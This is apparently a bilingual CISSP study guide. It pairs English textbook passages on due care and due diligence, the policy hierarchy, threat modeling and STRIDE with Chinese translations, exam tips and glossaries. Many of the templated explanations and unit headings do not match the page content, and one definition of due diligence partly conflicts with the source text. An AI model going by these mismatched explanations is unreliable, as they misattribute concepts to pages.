FedRAMP plays a critical role in securing federal government data and systems by ensuring that cloud services meet rigorous security standards. It also simplifies the procurement and adoption of cloud solutions for federal agencies by providing a standardized and transparent process for assessing and authorizing cloud services for government use. Information Technology Infrastructure Library (ITIL) Information Technology Infrastructure Library (ITIL) (itlibrary.org), initially crafted by the British government, is a set of recommended best practices for the optimization of IT services to support business growth, transformation, and change.

ITIL focuses on understanding how IT and security need to be integrated with and aligned to the objectives of an organization. ITIL and operational processes are often used as a starting point for the crafting of a customized IT security solution within an established infrastructure. There are many specialized security control frameworks, such as the SWIFT security control framework. The SWIFT security control framework refers to the set of security measures, guidelines, and best practices established by SWIFT (Society for Worldwide Interbank Financial Telecommunication) to ensure the security, trust, and integrity of financial messaging and transactions within the global financial network.

Due Diligence and Due Care Why is planning to plan security so important? One reason is the requirement for due diligence and due care. Due diligence is establishing a plan, policy, and process to protect the interests of an organization. Due care is practicing the individual activities that maintain the due diligence effort. For example, due diligence is developing a formalized security structure containing a security policy, standards, baselines, guidelines, and procedures. Due care is the continued application of this security structure onto the IT infrastructure of an organization.

Operational security is the ongoing maintenance of continued due diligence and due care by all responsible parties within an organization. Due diligence is knowing what should be done and planning for it; due care is doing the right action at the right time. FedRAMP

中文直译 / 整理

通过确保云服务符合严格的安全标准,在保护联邦政府数据和系 统方面发挥着关键作用。 它还通过提供一种标准化且透明的流程来评估和授 权云服务以供政府使用,从而简化了联邦机构采购和采用云解决方案的过程。 信息技术基础设施库(ITIL) 信息技术基础设施库(ITIL)(itlibrary.org)最初由英国政府制定,是一套 推荐的最佳实践,旨在优化IT服务以支持业务增长、转型和变革。 ITIL侧重于 理解IT和安全如何与组织的目标集成和对齐。 ITIL和运营流程通常被用作在现 有基础设施内制定定制化IT安全解决方案的起点。 有许多专门的安全控制框架,例如SWIFT安全控制框架。 SWIFT安 全控制框架是指由SWIFT(环球银行金融电信协会)制定的一系列安全措 施、指南和最佳实践,旨在确保全球金融网络内金融消息传递和交易的安 全性、可信性与完整性。 尽职调查与谨慎义务 为什么规划安全如此重要? 其中一个原因是需要尽职调查和谨慎行事。 尽职调 查是指制定计划、政策和流程以保护组织的利益。 谨慎行事是指实施维持尽职 调查努力的个体活动。 例如,尽职调查是建立一个包含安全政策、标准、基线、 指南和程序的正式化安全结构;

而谨慎行事则是将这一安全结构持续应用于组 织的IT基础设施。 运营安全是指组织内所有责任方持续维持尽职调查和谨慎行 事。 尽职调查是知道应该做什么并为之规划; 谨慎行事是在正确的时间采取正 确的行动。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

安全控制框架:控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。

FedRAMP:FedRAMP 用于美国联邦云服务授权和持续监控。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

ISO、NIST、COBIT、SABSA、PCI DSS、FedRAMP 都常考。

美国政府云服务、云授权、持续监控常对应 FedRAMP。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
安全控制框架 控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。
FedRAMP FedRAMP 用于美国联邦云服务授权和持续监控。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
学习单元 35 / PDF P112

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

Due diligence is also used as a detection mechanism, referred to as “do detect.” The idea is that while due care (aka “do correct”) activities are being performed, due diligence is used to oversee and confirm that the proper actions are being taken and that a record of such actions is being created. This is an extension of the planning concept based on continued oversight while performing tasks properly. Additionally, as conditions change (whether new threats, risks, or business tasks), due diligence is the adjustment of prior plans to take into account new conditions and concerns. Once updated, due care implements the revised plans. In today's business environment, prudence is mandatory.

Showing due diligence and due care is the only way to disprove negligence in an occurrence of loss. Senior management must show due care and due diligence to reduce their culpability and liability when a loss occurs. Security Policy, Standards, Procedures, and Guidelines For most organizations, maintaining security is an essential part of ongoing business. To reduce the likelihood of a security failure, implementing security has been formalized with a hierarchical organization of documentation. Developing and implementing documented security policies, standards, procedures, and guidelines produces a solid and reliable security infrastructure.

Security Policies The top tier of the formalization is known as a security policy. A security policy is a document that defines the scope of security needed by the organization and discusses the assets that require protection and the extent to which security solutions should go to provide the necessary protection. The security policy is an overview or generalization of an organization's security needs. It defines the strategic security objectives, vision, and goals and outlines the security framework of an organization.

The security policy is used to assign responsibilities, define roles, specify audit requirements, outline enforcement processes, indicate compliance requirements, and define acceptable risk levels. This document is often used as proof that senior management has exercised due diligence in protecting itself against intrusion, attack, and disaster. Security policies are compulsory.

中文直译 / 整理

尽职调查还被用作一种检测机制,称为“检测”。 其理念是,在执行谨慎行事 (即“正确执行”)活动的同时,尽职调查用于监督并确认正在采取正确的措 施,并且正在创建相关行动的记录。 这是基于在正确执行任务过程中持续监督 的规划概念的延伸。 此外,随着情况变化(无论是新的威胁、风险还是业务任 务),尽职调查是对先前计划进行调整,以考虑新的情况和关切。 一旦更新, 谨慎行事将实施修订后的计划。 在当今的商业环境中,谨慎是必不可少的。 在发生损失时,展现出应有的勤勉 和注意是证明不存在过失的唯一途径。 高级管理层必须展现出应有的勤勉和注 意,以降低在损失发生时的责任和可归责性。 安全政策、标准、规程和指南 对大多数组织而言,维护安全是持续业务的重要组成部分。 为降低安全失败的 可能性,安全实施已被规范化为一种分层的文档组织结构。 制定并实施文档化 的安全政策、标准、规程和指南,能够构建坚实可靠的安全基础设施。 安全政策 正式化体系的最高层被称为安全策略。 一个安全策略是一个文档,定义了 组织所需的安全范围,讨论了需要保护的资产以及安全解决方案应达到何种程 度以提供必要的保护。

安全策略是对组织安全需求的概述或概括,它定义了战 略安全目标、愿景和宗旨,并勾勒出组织的安全框架。 安全策略用于分配责任、 定义角色、规定审计要求、概述执行流程、指明合规要求以及定义可接受的风 险水平。 该文档常被用作证明高级管理层已尽职保护自身免受入侵、攻击和灾 难的证据。 安全策略是强制性的。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

分层:分层把控制按层排列,让攻击者必须连续突破。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
分层 分层把控制按层排列,让攻击者必须连续突破。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
学习单元 36 / PDF P113

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Many organizations employ several types of security policies to define or outline their overall security strategy. An organizational security policy focuses on issues relevant to every aspect of an organization. An issuespecific security policy focuses on a specific network service, department, function, or other aspect that is distinct from the organization as a whole. A system-specific security policy focuses on individual systems or types of systems and prescribes approved hardware and software, outlines methods for locking down a system, and even mandates firewall or other specific security controls.

From the security policies flow many other documents or sub-elements necessary for a complete security solution. Policies are broad overviews, whereas standards, baselines, guidelines, and procedures include more specific, detailed information on the actual security solution. Standards are the next level below security policies. Security Standards, Baselines, and Guidelines Once the main security policies are set, the remaining security documentation can be crafted under the guidance of those policies. Standards define compulsory requirements for the homogenous use of hardware, software, technology, and security controls.

They provide a course of action by which technology and procedures are uniformly implemented throughout an organization. A baseline defines a minimum level of security that every system throughout the organization must meet. A baseline is a more operationally focused form of a standard. All systems not complying with the baseline should be taken out of production until they can be brought up to the baseline. The baseline establishes a common foundational secure state on which all additional and more stringent security measures can be built. Baselines are usually systemspecific and often refer to an industry or government standard.

Guidelines are the next element of the formalized security policy structure. A guideline offers recommendations on how standards and baselines are implemented and serves as an operational guide for both security professionals and users. Guidelines are flexible, so they can be customized for each unique system or condition and can be used in the creation of new procedures. They state which security mechanisms should be deployed instead of prescribing a specific product or control and detailing configuration

中文直译 / 整理

许多组织采用多种类型的安全策略来定义或概述其整体安全战略。 组织安全 策略关注与组织各个方面相关的议题。 特定议题安全策略聚焦于与组织整体 不同的特定网络服务、部门、职能或其他方面。 系统特定安全策略则聚焦于 单个系统或特定类型的系统,规定批准的硬件和软件,概述锁定系统的方法, 甚至强制要求防火墙或其他特定安全控制措施。 从安全策略中衍生出许多其他文档或子元素,这些是构成完整安全解决方案 所必需的。 策略是宏观概述,而标准、基线、指南和规程则包含有关实际安 全解决方案的更具体、更详细的信息。 标准是低于安全策略的下一层次。 安全标准、基线和指南 一旦确定了主要的安全策略,其余的安全文档便可依据这些策略进行制定。 标准定义了硬件、软件、技术及安全控制措施统一使用的强制性要求。 它们为 组织内技术与规程的统一实施提供了行动路径。 基线定义了组织内每个系统必须达到的最低安全级别。 基线是一种更具操作性 的标准形式。 所有不符合基线的系统都应退出生产,直到其达到基线要求为止。 基线建立了一个共同的基础安全状态,所有额外且更严格的安全措施都可在此 基础上构建。 基线通常是系统特定的,并常参考行业或政府标准。

指南是正式安全策略结构的下一个要素。 一个指南提供有关如何实施标准和基 线的建议,并为安全专业人员和用户充当操作指南。 指南具有灵活性,因此可 以为每个独特的系统或情况定制,并可用于创建新程序。 它们说明应部署哪些 安全机制,而非规定特定产品或控制措施及详细配置

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 37 / PDF P114

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

settings. They outline methodologies, include suggested actions, and are not compulsory. Security Procedures Procedures are the final element of the formalized security policy structure. A procedure or standard operating procedure (SOP) is a detailed, step-by-step how-to document that describes the exact actions necessary to implement a specific security mechanism, control, or solution. A procedure could discuss the entire system deployment operation or focus on a single product or aspect. They must be updated as the hardware and software of a system evolve. The purpose of a procedure is to ensure the integrity of business processes through standardization and consistency of results.

Keeping these various security documents as separate entities provides these benefits: Not all users need to know the security standards, baselines, guidelines, and procedures for all security classification levels. When changes occur, it is easier to update and redistribute only the affected material rather than updating a monolithic policy and redistributing it throughout the organization. Many organizations struggle just to define the foundational parameters of their security, much less detail every single aspect of their day-to-day activities. However, in theory, a detailed and complete security policy supports real-world security in a directed, efficient, and specific manner.

Once the security policy documentation is reasonably complete, it can be used to guide decisions, train new users, respond to problems, and predict trends for future expansion. Threat Modeling Threat modeling is the security process where potential threats are identified, categorized, and analyzed. Threat modeling can be performed as a proactive measure during design and development or as a reactive measure once a product has been deployed. In either case, the process identifies the potential harm, the probability of occurrence, the priority of concern, and the means to eradicate or reduce the threat.

中文直译 / 整理

设置。 它们概述了方法论,包含建议的操作,且非强制性。 安全规程 规程是正式安全策略结构的最后一个要素。 一个规程或标准操作程序( SOP)是一个详细的、分步骤的操作指南,描述了实施特定安全机制、控制或 解决方案所需的精确操作。 规程可能涵盖整个系统部署操作,也可能聚焦于单 一产品或方面。 随着系统硬件和软件的演变,规程必须及时更新。 规程的目的 是通过标准化和结果的一致性来确保业务流程的完整性。 将这些不同的安全文档作为独立实体管理,具有以下优势: 并非所有用户都需要了解所有安全分类级别的安全标准、基线、指南和规程。 当发生变更时,只需更新和重新分发受影响的部分,而无需更新整个 一体化的策略并将其在整个组织中重新分发。 许多组织甚至难以定义其安全性的基础参数,更不用说详尽描述日常活动的 每一个细节了。 然而,理论上,详尽而完整的安全策略能够以明确、高效和 具体的方式支持现实中的安全。 一旦安全策略文档基本完善,即可用于指导 决策、培训新用户、应对问题以及预测未来扩展的趋势。 威胁建模 威胁建模是一种安全流程,用于识别、分类和分析潜在威胁。

威胁建模可以在 设计和开发阶段作为预防性措施执行,也可以在产品部署后作为应对性措施执 行。 无论哪种情况,该流程都会识别潜在危害、发生概率、关注优先级以及消 除或降低威胁的手段。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 38 / PDF P115

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Threat modeling isn't meant to be a single event. Instead, it's meant to be initiated early in the design process of a system and continue throughout its life cycle. For example, Microsoft uses a security development life cycle (SDL) which includes a range of procedures aimed at bolstering security assurance and compliance prerequisites. (See www.microsoft.com/enus/securityengineering/sdl). This SDL aids developers in creating software that is more secure by diminishing the quantity and seriousness of software vulnerabilities, all the while trimming development expenses.

A defensive approach to threat modeling takes place during the early stages of systems development, specifically during initial design and specifications establishment. This method is based on predicting threats and designing in specific defenses during the coding and crafting process. In most cases, integrated security solutions are more cost-effective and more successful than those shoehorned in later. While not a formal term, this concept could be considered a proactive approach to threat management.

中文直译 / 整理

威胁建模并非一次性的事件。 相反,它应在系统设计过程的早期启动,并贯穿 其整个生命周期。 例如,微软采用安全开发生命周期(SDL),其中包含一系 列旨在加强安全保证和合规性要求的程序。 (参见www.microsoft.com/enus/securityengineering/sdl。 该SDL通过减少软件漏洞的数量和严重性,同 时降低开发成本,帮助开发人员创建更安全的软件。 一种防御性方法的威胁建模发生在系统开发的早期阶段,具体而言是在初始 设计和规格制定期间。 这种方法基于预测威胁,并在编码和构建过程中内置 特定的防御措施。 在大多数情况下,集成的安全解决方案比后期强行添加的 方案更具成本效益且更成功。 尽管这不是一个正式术语,但这一概念可被视 为一种主动方法的威胁管理。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

程序:程序是一步一步怎么做。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

Step-by-step、SOP 常对应 procedure。

越早做威胁建模,修复成本越低。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
程序 程序是一步一步怎么做。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 39 / PDF P116

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Unfortunately, not all threats can be predicted during the design phase, so a reactive approach to threat management is still needed to address unforeseen issues. This concept is often called threat hunting or may be referred to as an adversarial approach. Threat hunting is the activity of looking for existing evidence of a compromise once symptoms or an IoC (indication of compromise) of an exploit become known. Threat modeling looks for zero-day exploits before harm is experienced, whereas threat hunting uses IoC information to find harm that has already occurred. An adversarial approach to threat modeling takes place after a product has been created and deployed.

This deployment could be in a test or laboratory environment or in the general marketplace. This technique of threat hunting is the core concept behind ethical hacking, penetration testing, source code review, and fuzz testing. Although these processes are often useful in finding flaws and threats, they, unfortunately, result in additional effort in coding to add new countermeasures, typically released as patches. This results in less effective security improvements (over defensive threat modeling) at the cost of potentially reducing functionality and user-friendliness.

Fuzz testing is a specialized dynamic testing technique that provides many different types of input to software to stress its limits and find previously undetected flaws. See Chapter 15 for more on fuzz testing. Identifying Threats There's an almost infinite possibility of threats, so it's important to use a structured approach to accurately identify relevant threats. For example, some organizations use one or more of the following three approaches: Focused on Assets This method uses asset valuation results and attempts to identify threats to valuable assets.

Focused on Attackers Some organizations are able to identify potential attackers and can identify the threats they represent based on the attackers' motivations, goals, or tactics, techniques, and procedures (TTPs).

中文直译 / 整理

不幸的是,并非所有威胁都能在设计阶段被预测,因此仍需要一种被动 方法来应对未预见的问题。 这一概念通常被称为威胁狩猎,或称为对抗性方 法。 威胁狩猎是指在已知攻击症状或妥协指标(IoC)后,寻找已遭入侵的 证据的活动。 威胁建模旨在在损害发生前发现零日漏洞,而威胁狩猎则利用 IoC信息来发现已经发生的损害。 对抗性威胁建模方法在产品创建并部署后进行。 这种部署可能发生在测试或 实验室环境中,也可能发生在通用市场上。 这种威胁狩猎技术是道德黑客、 渗透测试、源代码审查和模糊测试的核心概念。 尽管这些过程通常有助于发 现缺陷和威胁,但不幸的是,它们会导致额外的编码工作以添加新的应对措 施,通常以补丁形式发布。 这导致安全改进效果(相较于防御性威胁建模) 较差,并可能降低功能性和用户友好性。 模糊测试是一种专门的动态测试技术,通过向软件提供多种不同类型的输入来 测试其极限并发现此前未检测到的缺陷。 详见第15章了解更多关于模糊测试的 内容。 识别威胁 威胁的可能性几乎是无限的,因此采用结构化方法准确识别相关威胁至关 重要。

例如,一些组织使用以下三种方法中的一种或多种: 以资产为中心 此方法利用资产估值结果,试图识别对重要资产的威胁。 专注于攻击者 一些组织能够识别潜在的攻击者,并根据攻击者的动机、目 标或战术、技术和程序(TTPs)识别其所构成的威胁。

小白解释

场景先行:你是公司的安全负责人,正在读第 116 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

程序:程序是一步一步怎么做。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

威胁狩猎:威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

Step-by-step、SOP 常对应 procedure。

越早做威胁建模,修复成本越低。

Threat modeling 偏预防设计,threat hunting 偏主动发现已存在威胁。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
程序 程序是一步一步怎么做。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
威胁狩猎 威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 40 / PDF P117

威胁建模与威胁狩猎

建模偏设计前预判,狩猎偏运行中主动找证据。

教材原文段落

Focused on Software If an organization develops software, it can consider potential threats against the software. It's common to pair threats with vulnerabilities to identify threats that can exploit assets and represent significant risks to the organization. The ultimate goal of threat modeling is to prioritize the potential threats against an organization's valuable assets. When attempting to inventory and categorize threats, it is often helpful to use a guide or reference. Microsoft developed a threat categorization scheme known as the STRIDE threat model.

STRIDE is an acronym standing for the following: Spoofing: An attack with the goal of gaining access to a target system through the use of a falsified identity. When an attacker spoofs their identity as a valid or authorized entity, they are often able to bypass filters and blockades against unauthorized access. Tampering: Any action resulting in unauthorized changes or manipulation of data, whether in transit or in storage. Repudiation: The ability of a user or attacker to deny having performed an action or activity by maintaining plausible deniability. Repudiation attacks can also result in innocent third parties being blamed for security violations.

Information disclosure: The revelation or distribution of private, confidential, or controlled information to external or unauthorized entities. Denial of service (DoS): An attack that attempts to prevent authorized use of a resource. This can be done through flaw exploitation, connection overloading, or traffic flooding. Elevation of privilege: An attack where a limited user account is transformed into an account with greater privileges, powers, and access. Process for Attack Simulation and Threat Analysis (PASTA) is a seven-stage threat modeling methodology.

PASTA is a risk-centric approach that aims at selecting or developing countermeasures in relation to the value of the assets to be protected. The following are the seven steps of PASTA: Stage I: Definition of the Objectives (DO)

中文直译 / 整理

专注于软件 如果一个组织开发软件,它可以考虑针对该软件的潜在威胁。 通常将威胁与漏洞配对,以识别可能 利用资产并对组织构成重大风险的威胁。 威胁建模的最终目标是优先处理针对 组织关键资产的潜在威胁。 在尝试清点和分类威胁时,使用指南或参考通常很有帮助。 微软开发了一种称 为STRIDE威胁模型的威胁分类方案。 STRIDE是以下术语的首字母缩写: 伪造:一种通过使用虚假身份获取目标系统访问权限的攻击。 当攻击 者伪装成合法或授权实体时,他们通常能够绕过针对未授权访问的过 滤器和封锁。 篡改:任何导致数据在传输或存储过程中被未经授权更改或操纵 的行为。 抵赖:用户或攻击者通过保持合理的否认能力,否认自己执行过某项操作 或活动的能力。 抵赖攻击还可能导致无辜的第三方被归咎于安全违规行为。 信息泄露:将私有、机密或受控信息泄露给外部或未经授权的实体。 拒绝服务(DoS):一种旨在阻止授权用户使用资源的攻击。 这可以通过 利用漏洞、连接过载或流量泛洪来实现。 权限提升:一种攻击,其中受限用户账户 被转换为具有更高权限、权力和访问能力的账户。 攻击模拟与威胁分析流程(PASTA)是一种七阶段的威胁建模方法。

PASTA是 一种以风险为中心的方法,旨在根据待保护资产的价值选择或开发对策。 以下 是PASTA的七个步骤: 第一阶段:目标定义(DO)

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:建模偏设计前预判,狩猎偏运行中主动找证据。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

指南:指南是建议做法,不一定强制。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

STRIDE:STRIDE 用六类威胁检查系统:伪装、篡改、抵赖、信息泄露、拒绝服务、提权。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模与威胁狩猎”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Recommended、not compulsory 常对应 guideline。

越早做威胁建模,修复成本越低。

STRIDE 是威胁分类模型。

PASTA 强调业务目标、技术范围、攻击模拟和风险分析。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
指南 指南是建议做法,不一定强制。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
STRIDE STRIDE 用六类威胁检查系统:伪装、篡改、抵赖、信息泄露、拒绝服务、提权。
PASTA PASTA 是七阶段、风险中心的威胁建模方法。
